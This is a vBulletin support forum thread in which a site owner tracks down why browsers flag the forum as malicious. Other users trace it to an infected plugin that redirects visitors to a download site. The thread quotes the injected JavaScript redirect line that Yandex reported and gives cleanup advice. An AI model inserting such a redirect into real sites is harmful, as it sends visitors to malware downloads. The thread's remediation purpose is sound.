When i open my forum in Opera. Malicious site warning has shown
Malicious site warning

This site may be hacked or contain malicious software. Visiting this page may be harmful.

Opera Software strongly discourages visiting this page.
Go back safely
Ignore this warning
Why was this page blocked?


Reported by Yandex
Our fraud reports are maintained by third-party vendors.
But Yandex show, "Your site doesn't have any violations"
How to remove this warning?
forum link: www.pakistanipoint.com

https://vborg.vbsupport.ru/external/2017/01/19.png

google "yandex remove site from blacklist" and you should find your answer.

google "yandex remove site from blacklist" and you should find your answer.

I am working on it almost one week but could not find any malicious code. Now Yandex show my website contains malicious code. I try to scan forum from different malware scanner, all clear my forum.
May you suggest me any malware scanner for scanning?

filestore72

Resources:
https://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info

https://clients.urljet.com/knowledgebase/147/Fix-HOW-TO-FIX---Vbulletin-redirecting-to-filestore123com-version-2.html

https://clients.urljet.com/knowledgebase/138/Fix-vBulletin-4xx-Filestore123-Hack.html

--------------- Added 1484422187 at 1484422187 ---------------

And also protect your admincp folder with a passworded htaccess....

filestore72

Resources:
https://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info

https://clients.urljet.com/knowledgebase/147/Fix-HOW-TO-FIX---Vbulletin-redirecting-to-filestore123com-version-2.html

https://clients.urljet.com/knowledgebase/138/Fix-vBulletin-4xx-Filestore123-Hack.html

--------------- Added 1484422187 at 1484422187 ---------------

And also protect your admincp folder with a passworded htaccess....
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware


You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.

my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.

Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.

You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.

thank you so much

--------------- Added 1484626252 at 1484626252 ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt file

--------------- Added 1484627008 at 1484627008 ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake

The following malicious code appears at your site from time to time:

document.location='http://myfilestore.com/download.php?id=ed4d0ec3'

when the following URL is loaded:

www.pakistanipoint.com/misc.php?v=422&js=js123456

Please, check your files and remove the malicious code.

thank you so much

--------------- Added 1484626252 at 1484626252 ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt for code


--------------- Added 1484627008 at 1484627008 ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake

Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
**Edit - Code to remove is marked by [Remove This Code] in attached file.

afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
Thank you so much sir

I cannot find how to save plugin display order

Thank you so much sir

I cannot find how to save plugin display order

AdminCP > Plugins & Products > Plugin Manager > *Now scroll to the bottom of the plugin list and click "Save Active Status" button. :cool:

ok sir
thanks
:D

Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).

I removed the code and my forum working fine. After some time forum start to redirect myfilestore.com. I disabled "Auto Check Remember Me & Rules Boxes" product and forum not redirect. Today i noticed that forum again start to redirect myfilestore, when i disable "Chrome Browser Notice by BOP5" product and forum not redirect. After few minutes, i enabled both products "Auto Check Remember Me & Rules Boxes" and "Chrome Browser Notice by BOP5" but forum working fine.
I could not find malicious code in both product.
Why forum again redirect to myfilestore? any suggestion?